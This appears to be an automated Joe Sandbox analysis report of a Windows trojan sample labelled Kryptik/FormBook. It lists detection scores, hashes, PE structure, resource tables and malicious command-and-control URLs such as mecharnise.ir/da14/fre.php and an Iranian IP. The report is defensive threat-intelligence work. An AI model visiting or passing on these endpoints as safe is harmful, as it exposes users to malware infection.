              Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)2
              Obfuscated Files or Information
              NTDS1
              Remote System Discovery
              Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets13
              System Information Discovery
              SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe85%ReversingLabsWin32.Trojan.FormBook
              HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe84%VirustotalBrowse
              HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe100%AviraHEUR/AGEN.1331248
              HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe100%Joe Sandbox ML
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              mecharnise.ir19%VirustotalBrowse
              SourceDetectionScannerLabelLink
              http://kbfvzoboss.bid/alien/fre.php0%URL Reputationsafe
              http://kbfvzoboss.bid/alien/fre.php0%URL Reputationsafe
              http://alphastand.top/alien/fre.php0%URL Reputationsafe
              http://www.ibsensoftware.com/0%URL Reputationsafe
              http://alphastand.win/alien/fre.php0%URL Reputationsafe
              http://alphastand.trade/alien/fre.php0%URL Reputationsafe
              http://mecharnise.ir/da14/fre.php%100%Avira URL Cloudmalware
              https://mecharnise.ir/?s=100%Avira URL Cloudmalware
              https://mecharnise.ir/wp-json/100%Avira URL Cloudmalware
              https://mecharnise.ir/comments/feed/100%Avira URL Cloudmalware
              https://mecharnise.ir/feed/100%Avira URL Cloudmalware
              https://mecharnise.ir/100%Avira URL Cloudmalware
              http://mecharnise.ir/da14/fre.phpA100%Avira URL Cloudmalware
              https://mecharnise.ir/#website100%Avira URL Cloudmalware
              https://mecharnise.ir/comments/feed/17%VirustotalBrowse
              http://mecharnise.ir/da14/fre.php100%Avira URL Cloudmalware
              NameIPActiveMaliciousAntivirus DetectionReputation
              mecharnise.ir
              185.8.173.81
              truetrueunknown
              NameMaliciousAntivirus DetectionReputation
              http://kbfvzoboss.bid/alien/fre.phptrue
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              http://alphastand.top/alien/fre.phptrue
              • URL Reputation: safe
              unknown
              http://alphastand.win/alien/fre.phptrue
              • URL Reputation: safe
              unknown
              http://alphastand.trade/alien/fre.phptrue
              • URL Reputation: safe
              unknown
              http://mecharnise.ir/da14/fre.phptrue
              • Avira URL Cloud: malware
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              https://yoast.com/wordpress/plugins/seo/HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe, 00000001.00000002.372103621.0000000002937000.00000004.00000020.00020000.00000000.sdmp, HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe, 00000001.00000002.371920338.0000000000738000.00000004.00000020.00020000.00000000.sdmpfalse
                high
                http://www.ibsensoftware.com/HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe, 00000000.00000002.354230910.00000000027A0000.00000040.10000000.00040000.00000000.sdmp, HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe, 00000000.00000002.354156743.0000000002460000.00000004.00001000.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://mecharnise.ir/wp-json/HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe, 00000001.00000002.371920338.0000000000738000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: malware
                unknown
                https://mecharnise.ir/comments/feed/HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe, 00000001.00000002.372103621.0000000002937000.00000004.00000020.00020000.00000000.sdmp, HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe, 00000001.00000002.371920338.0000000000738000.00000004.00000020.00020000.00000000.sdmpfalse
                • 17%, Virustotal, Browse
                • Avira URL Cloud: malware
                unknown
                https://api.w.org/HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe, 00000001.00000002.371920338.0000000000738000.00000004.00000020.00020000.00000000.sdmpfalse
                  high
                  https://mecharnise.ir/?s=HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe, 00000001.00000002.372103621.0000000002937000.00000004.00000020.00020000.00000000.sdmp, HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe, 00000001.00000002.371920338.0000000000738000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  unknown
                  http://mecharnise.ir/da14/fre.php%HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe, 00000001.00000002.371920338.0000000000738000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  unknown
                  https://mecharnise.ir/feed/HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe, 00000001.00000002.372103621.0000000002937000.00000004.00000020.00020000.00000000.sdmp, HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe, 00000001.00000002.371920338.0000000000738000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  unknown
                  https://mecharnise.ir/HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe, 00000001.00000002.372103621.0000000002937000.00000004.00000020.00020000.00000000.sdmp, HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe, 00000001.00000002.371920338.0000000000738000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  unknown
                  https://schema.orgHEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe, 00000001.00000002.372103621.0000000002937000.00000004.00000020.00020000.00000000.sdmp, HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe, 00000001.00000002.371920338.0000000000738000.00000004.00000020.00020000.00000000.sdmpfalse
                    high
                    http://mecharnise.ir/da14/fre.phpAHEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe, 00000001.00000002.372103621.0000000002937000.00000004.00000020.00020000.00000000.sdmp, HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe, 00000001.00000002.371920338.0000000000738000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    unknown
                    https://mecharnise.ir/#websiteHEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe, 00000001.00000002.372103621.0000000002937000.00000004.00000020.00020000.00000000.sdmp, HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe, 00000001.00000002.371920338.0000000000738000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    unknown
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
                    IPDomainCountryFlagASNASN NameMalicious
                    185.8.173.81
                    mecharnise.irIran (ISLAMIC Republic Of)
                    60631PARVASYSTEMIRtrue
                    Joe Sandbox Version:38.0.0 Beryl
                    Analysis ID:1286555
                    Start date and time:2023-08-06 05:16:08 +02:00
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 3m 14s
                    Hypervisor based Inspection enabled:false
                    Report type:light
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                    Number of analysed new started processes analysed:2
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample file name:HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@3/2@4/1
                    EGA Information:
                    • Successful, ratio: 100%
                    HDC Information:Failed
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 0
                    • Number of non-executed functions: 0
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Stop behavior analysis, all processes terminated
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • TCP Packets have been reduced to 100
                    TimeTypeDescription
                    05:17:04API Interceptor1x Sleep call for process: HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe modified
                    No context
                    No context
                    No context
                    No context
                    No context
                    Process:C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe
                    File Type:very short file (no magic)
                    Category:dropped
                    Size (bytes):1
                    Entropy (8bit):0.0
                    Encrypted:false
                    SSDEEP:3:U:U
                    MD5:C4CA4238A0B923820DCC509A6F75849B
                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                    Malicious:false
                    Reputation:high, very likely benign file
                    Preview:1
                    Process:C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):46
                    Entropy (8bit):1.0424600748477153
                    Encrypted:false
                    SSDEEP:3:/lbON:u
                    MD5:89CA7E02D8B79ED50986F098D5686EC9
                    SHA1:A602E0D4398F00C827BFCF711066E67718CA1377
                    SHA-256:30AC626CBD4A97DB480A0379F6D2540195F594C967B7087A26566E352F24C794
                    SHA-512:C5F453E32C0297E51BE43F84A7E63302E7D1E471FADF8BB789C22A4D6E03712D26E2B039D6FBDBD9EBD35C4E93EC27F03684A7BBB67C4FADCCE9F6279417B5DE
                    Malicious:false
                    Reputation:high, very likely benign file
                    Preview:........................................user.
                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Entropy (8bit):6.9421101106162
                    TrID:
                    • Win32 Executable (generic) a (10002005/4) 93.47%
                    • Win32 Executable Borland Delphi 7 (665061/41) 6.21%
                    • Win32 Executable Delphi generic (14689/80) 0.14%
                    • Windows Screen Saver (13104/52) 0.12%
                    • Win16/32 Executable Delphi generic (2074/23) 0.02%
                    File name:HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe
                    File size:612'864 bytes
                    MD5:bf37ed340770102309554be2789becc4
                    SHA1:9710046d98ca399fa2ced91060acd98a126e56b3
                    SHA256:ba2fdc59950c64afa4429a28ff4036f496e519a867c3182e322d78c0eef27952
                    SHA512:c6a1d8047094d42d0f84a16b584a659aab6863630773d4b010412062131430b1308e8c6fb18cfdf9d6591b6b03818e5e68e005740ec4432b0ac3ba528c37e7d4
                    SSDEEP:12288:MC1TxYROXXH+NrZEb3StxjYr5CEsa5Zhb+Z5:ltPHeO3q21Cla57by
                    TLSH:E6D49E22F2A04433D1B3567D9C1B9778E826FE513938A9472BE4DC4C6F39381797A287
                    File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                    Icon Hash:9292b0b191b1b2bf
                    Entrypoint:0x465748
                    Entrypoint Section:CODE
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                    DLL Characteristics:
                    Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:4
                    OS Version Minor:0
                    File Version Major:4
                    File Version Minor:0
                    Subsystem Version Major:4
                    Subsystem Version Minor:0
                    Import Hash:e69d91ce4b5556e616458c5a122c112e
                    Instruction
                    push ebp
                    mov ebp, esp
                    add esp, FFFFFFF0h
                    mov eax, 00465560h
                    call 00007F9EE42CE48Dh
                    mov eax, dword ptr [004671ACh]
                    mov eax, dword ptr [eax]
                    call 00007F9EE4324581h
                    mov ecx, dword ptr [004672B4h]
                    mov eax, dword ptr [004671ACh]
                    mov eax, dword ptr [eax]
                    mov edx, dword ptr [0045E904h]
                    call 00007F9EE4324581h
                    mov eax, dword ptr [004671ACh]
                    mov eax, dword ptr [eax]
                    call 00007F9EE43245F5h
                    call 00007F9EE42CC54Ch
                    lea eax, dword ptr [eax+00h]
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    NameVirtual AddressVirtual Size Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IMPORT0x690000x220c.idata
                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x750000x265d8.rsrc
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x6e0000x6dc0.reloc
                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                    IMAGE_DIRECTORY_ENTRY_TLS0x6d0000x18.rdata
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                    CODE0x10000x647900x64800False0.5338420203669154data6.572882057194971IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    DATA0x660000x134c0x1400False0.4328125data4.004621889563762IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    BSS0x680000xbf10x0False0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .idata0x690000x220c0x2400False0.3502604166666667data4.882384230816852IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .tls0x6c0000x100x0False0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .rdata0x6d0000x180x200False0.048828125data0.2005819074398449IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                    .reloc0x6e0000x6dc00x6e00False0.6033025568181818data6.66040018123958IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                    .rsrc0x750000x265d80x26600False0.7703010484527687data7.2658600414485806IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                    NameRVASizeTypeLanguageCountryZLIB Complexity
                    RT_CURSOR0x785c80x134Targa image data - Map 64 x 65536 x 1 +32 "\001"0.38636363636363635
                    RT_CURSOR0x786fc0x134data0.4642857142857143
                    RT_CURSOR0x788300x134data0.4805194805194805
                    RT_CURSOR0x789640x134data0.38311688311688313
                    RT_CURSOR0x78a980x134data0.36038961038961037
                    RT_CURSOR0x78bcc0x134data0.4090909090909091
                    RT_CURSOR0x78d000x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"0.4967532467532468
                    RT_CURSOR0x78e340x20cdataEnglishUnited States1.0114503816793894
                    RT_CURSOR0x790400x20cdataEnglishUnited States1.0076335877862594
                    RT_CURSOR0x7924c0x20cdataEnglishUnited States1.0114503816793894
                    RT_CURSOR0x794580x20cdataEnglishUnited States1.0171755725190839
                    RT_CURSOR0x796640x20cdataEnglishUnited States1.0095419847328244
                    RT_CURSOR0x798700x20cdataEnglishUnited States1.015267175572519
                    RT_CURSOR0x79a7c0x20cdataEnglishUnited States1.0095419847328244
                    RT_CURSOR0x79c880x20cdataEnglishUnited States1.0133587786259541
                    RT_CURSOR0x79e940x20cdataEnglishUnited States1.0209923664122138
                    RT_CURSOR0x7a0a00x20cdataEnglishUnited States1.0209923664122138
                    RT_CURSOR0x7a2ac0x20cdataEnglishUnited States1.0114503816793894
                    RT_CURSOR0x7a4b80x20cdataEnglishUnited States1.0171755725190839
                    RT_CURSOR0x7a6c40x20cdataEnglishUnited States1.015267175572519
                    RT_CURSOR0x7a8d00x20cdataEnglishUnited States1.0171755725190839
                    RT_CURSOR0x7aadc0x20cdataEnglishUnited States1.0133587786259541
                    RT_CURSOR0x7ace80x20cdataEnglishUnited States1.0133587786259541
                    RT_CURSOR0x7aef40x20cdataEnglishUnited States1.0133587786259541
                    RT_CURSOR0x7b1000x20cdataEnglishUnited States1.0133587786259541
                    RT_CURSOR0x7b30c0x20cdataEnglishUnited States1.0209923664122138
                    RT_CURSOR0x7b5180x20cdataEnglishUnited States1.0114503816793894
                    RT_CURSOR0x7b7240x20cdataEnglishUnited States1.0209923664122138
                    RT_CURSOR0x7b9300x20cdataEnglishUnited States1.0209923664122138
                    RT_CURSOR0x7bb3c0x20cdataEnglishUnited States1.0133587786259541
                    RT_CURSOR0x7bd480x20cdataEnglishUnited States1.0114503816793894
                    RT_CURSOR0x7bf540x20cdataEnglishUnited States1.0133587786259541
                    RT_CURSOR0x7c1600x20cdataEnglishUnited States1.0133587786259541
                    RT_CURSOR0x7c36c0x20cdataEnglishUnited States1.0133587786259541
                    RT_CURSOR0x7c5780x20cdataEnglishUnited States1.0209923664122138
                    RT_CURSOR0x7c7840x20cdataEnglishUnited States1.0209923664122138
                    RT_CURSOR0x7c9900x20cdataEnglishUnited States1.0114503816793894
                    RT_CURSOR0x7cb9c0x20cdataEnglishUnited States1.0133587786259541
                    RT_CURSOR0x7cda80x20cdataEnglishUnited States1.015267175572519
                    RT_CURSOR0x7cfb40x20cdataEnglishUnited States1.015267175572519
                    RT_CURSOR0x7d1c00x20cdataEnglishUnited States1.0171755725190839
                    RT_CURSOR0x7d3cc0x20cdataEnglishUnited States1.0133587786259541
                    RT_CURSOR0x7d5d80x20cdataEnglishUnited States1.0057251908396947
                    RT_CURSOR0x7d7e40x20cdataEnglishUnited States1.015267175572519
                    RT_CURSOR0x7d9f00x20cdataEnglishUnited States1.0209923664122138
                    RT_CURSOR0x7dbfc0x20cdataEnglishUnited States1.0114503816793894
                    RT_CURSOR0x7de080x20cdataEnglishUnited States1.015267175572519
                    RT_CURSOR0x7e0140x20cdataEnglishUnited States1.0133587786259541
                    RT_CURSOR0x7e2200x20cdataEnglishUnited States1.0133587786259541
                    RT_CURSOR0x7e42c0x20cdataEnglishUnited States1.0114503816793894
                    RT_CURSOR0x7e6380x20cdataEnglishUnited States1.0114503816793894
                    RT_CURSOR0x7e8440x20cdataEnglishUnited States1.0171755725190839
                    RT_CURSOR0x7ea500x20cdataEnglishUnited States1.015267175572519
                    RT_CURSOR0x7ec5c0x20cdataEnglishUnited States1.0209923664122138
                    RT_CURSOR0x7ee680x20cdataEnglishUnited States1.0209923664122138
                    RT_CURSOR0x7f0740x20cdataEnglishUnited States1.0114503816793894
                    RT_CURSOR0x7f2800x20cdataEnglishUnited States1.015267175572519
                    RT_CURSOR0x7f48c0x20cdataEnglishUnited States1.0114503816793894
                    RT_CURSOR0x7f6980x20cdataEnglishUnited States1.0095419847328244
                    RT_CURSOR0x7f8a40x20cdataEnglishUnited States1.0133587786259541
                    RT_CURSOR0x7fab00x20cdataEnglishUnited States1.0171755725190839
                    RT_CURSOR0x7fcbc0x20cdataEnglishUnited States1.015267175572519
                    RT_CURSOR0x7fec80x20cdataEnglishUnited States1.0114503816793894
                    RT_CURSOR0x800d40x20cdataEnglishUnited States1.0209923664122138
                    RT_CURSOR0x802e00x20cdataEnglishUnited States1.0114503816793894
                    RT_CURSOR0x804ec0x20cdataEnglishUnited States1.0171755725190839
                    RT_CURSOR0x806f80x20cdataEnglishUnited States1.0114503816793894
                    RT_CURSOR0x809040x20cdataEnglishUnited States1.0114503816793894
                    RT_CURSOR0x80b100x20cdataEnglishUnited States1.0133587786259541
                    RT_CURSOR0x80d1c0x20cdataEnglishUnited States1.0209923664122138
                    RT_CURSOR0x80f280x20cdataEnglishUnited States1.0209923664122138
                    RT_CURSOR0x811340x20cdataEnglishUnited States1.0171755725190839
                    RT_CURSOR0x813400x20cdataEnglishUnited States1.0209923664122138
                    RT_CURSOR0x8154c0x20cdataEnglishUnited States1.0209923664122138
                    RT_CURSOR0x817580x20cdataEnglishUnited States1.015267175572519
                    RT_CURSOR0x819640x20cdataEnglishUnited States1.0095419847328244
                    RT_CURSOR0x81b700x20cdataEnglishUnited States1.0133587786259541
                    RT_CURSOR0x81d7c0x20cdataEnglishUnited States1.0114503816793894
                    RT_CURSOR0x81f880x20cdataEnglishUnited States1.0076335877862594
                    RT_CURSOR0x821940x20cOpenPGP Secret KeyEnglishUnited States1.0114503816793894
                    RT_CURSOR0x823a00x20cdataEnglishUnited States1.0133587786259541
                    RT_CURSOR0x825ac0x20cdataEnglishUnited States1.015267175572519
                    RT_CURSOR0x827b80x20cDyalog APL version 81.-109EnglishUnited States1.0209923664122138
                    RT_CURSOR0x829c40x20cdataEnglishUnited States1.015267175572519
                    RT_CURSOR0x82bd00x20cdataEnglishUnited States1.0114503816793894
                    RT_CURSOR0x82ddc0x20cdataEnglishUnited States1.0095419847328244
                    RT_CURSOR0x82fe80x20cdataEnglishUnited States1.0114503816793894
                    RT_CURSOR0x831f40x20cdataEnglishUnited States1.015267175572519
                    RT_CURSOR0x834000x20cdataEnglishUnited States1.0209923664122138
                    RT_CURSOR0x8360c0x20cdataEnglishUnited States1.0209923664122138
                    RT_CURSOR0x838180x20cdataEnglishUnited States1.0133587786259541
                    RT_CURSOR0x83a240x20cdataEnglishUnited States1.0209923664122138
                    RT_CURSOR0x83c300x20cdataEnglishUnited States1.0209923664122138
                    RT_CURSOR0x83e3c0x20cdataEnglishUnited States1.0133587786259541
                    RT_CURSOR0x840480x20cdataEnglishUnited States1.0133587786259541
                    RT_CURSOR0x842540x20cPGP Secret Sub-key -EnglishUnited States1.0171755725190839
                    RT_CURSOR0x844600x20cOpenPGP Public KeyEnglishUnited States1.0209923664122138
                    RT_CURSOR0x8466c0x20cdataEnglishUnited States1.0114503816793894
                    RT_CURSOR0x848780x20cdataEnglishUnited States1.0171755725190839
                    RT_CURSOR0x84a840x20cdataEnglishUnited States1.015267175572519
                    RT_CURSOR0x84c900x20cdataEnglishUnited States1.0076335877862594
                    RT_CURSOR0x84e9c0x20cdataEnglishUnited States1.0209923664122138
                    RT_CURSOR0x850a80x20cdataEnglishUnited States1.0133587786259541
                    RT_CURSOR0x852b40x20cdataEnglishUnited States1.015267175572519
                    RT_CURSOR0x854c00x20cdataEnglishUnited States1.0133587786259541
                    RT_CURSOR0x856cc0x20cdataEnglishUnited States1.015267175572519
                    RT_CURSOR0x858d80x20cdataEnglishUnited States1.0133587786259541
                    RT_CURSOR0x85ae40x20cdataEnglishUnited States1.0133587786259541
                    RT_CURSOR0x85cf00x20cdataEnglishUnited States1.0133587786259541
                    RT_CURSOR0x85efc0x20cdataEnglishUnited States1.0171755725190839
                    RT_CURSOR0x861080x20cdataEnglishUnited States1.0209923664122138
                    RT_CURSOR0x863140x20cdataEnglishUnited States1.0209923664122138
                    RT_CURSOR0x865200x20cdataEnglishUnited States1.0209923664122138
                    RT_CURSOR0x8672c0x20cdataEnglishUnited States1.015267175572519
                    RT_CURSOR0x869380x20cdataEnglishUnited States1.0171755725190839
                    RT_CURSOR0x86b440x20cdataEnglishUnited States1.0114503816793894
                    RT_CURSOR0x86d500x20cdataEnglishUnited States1.0114503816793894
                    RT_CURSOR0x86f5c0x20cdataEnglishUnited States1.0114503816793894
                    RT_CURSOR0x871680x20cdataEnglishUnited States1.0133587786259541
                    RT_CURSOR0x873740x20cdataEnglishUnited States1.0114503816793894
                    RT_CURSOR0x875800x20cdataEnglishUnited States1.0209923664122138
                    RT_CURSOR0x8778c0x20cdataEnglishUnited States1.0133587786259541
                    RT_CURSOR0x879980x20cdataEnglishUnited States1.0114503816793894
                    RT_CURSOR0x87ba40x20cdataEnglishUnited States1.0171755725190839
                    RT_CURSOR0x87db00x20cdataEnglishUnited States1.015267175572519
                    RT_CURSOR0x87fbc0x20cdataEnglishUnited States1.0171755725190839
                    RT_CURSOR0x881c80x20cdataEnglishUnited States1.0114503816793894
                    RT_CURSOR0x883d40x20cdataEnglishUnited States1.0114503816793894
                    RT_CURSOR0x885e00x20cdataEnglishUnited States1.015267175572519
                    RT_CURSOR0x887ec0x20cdataEnglishUnited States1.0209923664122138
                    RT_CURSOR0x889f80x20cdataEnglishUnited States1.0209923664122138
                    RT_CURSOR0x88c040x20cdataEnglishUnited States1.0133587786259541
                    RT_CURSOR0x88e100x20cdataEnglishUnited States1.015267175572519
                    RT_CURSOR0x8901c0x20cdataEnglishUnited States1.015267175572519
                    RT_CURSOR0x892280x20cdataEnglishUnited States1.015267175572519
                    RT_CURSOR0x894340x20cdataEnglishUnited States1.0133587786259541
                    RT_CURSOR0x896400x20cCOM executable for DOSEnglishUnited States1.0209923664122138
                    RT_CURSOR0x8984c0x20cdataEnglishUnited States1.0114503816793894
                    RT_CURSOR0x89a580x20cdataEnglishUnited States1.015267175572519
                    RT_CURSOR0x89c640x20cdataEnglishUnited States1.0209923664122138
                    RT_CURSOR0x89e700x20cdataEnglishUnited States1.0133587786259541
                    RT_CURSOR0x8a07c0x20cdataEnglishUnited States1.0076335877862594
                    RT_CURSOR0x8a2880x20cdataEnglishUnited States1.0171755725190839
                    RT_CURSOR0x8a4940x20cdataEnglishUnited States1.015267175572519
                    RT_CURSOR0x8a6a00x20cdataEnglishUnited States1.0171755725190839
                    RT_CURSOR0x8a8ac0x20cdataEnglishUnited States1.0133587786259541
                    RT_CURSOR0x8aab80x20cdataEnglishUnited States1.015267175572519
                    RT_CURSOR0x8acc40x20cdataEnglishUnited States1.015267175572519
                    RT_CURSOR0x8aed00x20cdataEnglishUnited States1.0209923664122138
                    RT_CURSOR0x8b0dc0x20cdataEnglishUnited States1.0209923664122138
                    RT_CURSOR0x8b2e80x20cdataEnglishUnited States1.0133587786259541
                    RT_CURSOR0x8b4f40x20cdataEnglishUnited States1.0133587786259541
                    RT_CURSOR0x8b7000x20cdataEnglishUnited States1.0171755725190839
                    RT_CURSOR0x8b90c0x20cdataEnglishUnited States1.0133587786259541
                    RT_CURSOR0x8bb180x20cdataEnglishUnited States1.0133587786259541
                    RT_CURSOR0x8bd240x20cdataEnglishUnited States1.0171755725190839
                    RT_CURSOR0x8bf300x20cdataEnglishUnited States1.0133587786259541
                    RT_CURSOR0x8c13c0x20cdataEnglishUnited States1.0133587786259541
                    RT_CURSOR0x8c3480x20cdataEnglishUnited States1.0209923664122138
                    RT_CURSOR0x8c5540x20cdataEnglishUnited States1.0209923664122138
                    RT_CURSOR0x8c7600x20cdataEnglishUnited States1.0095419847328244
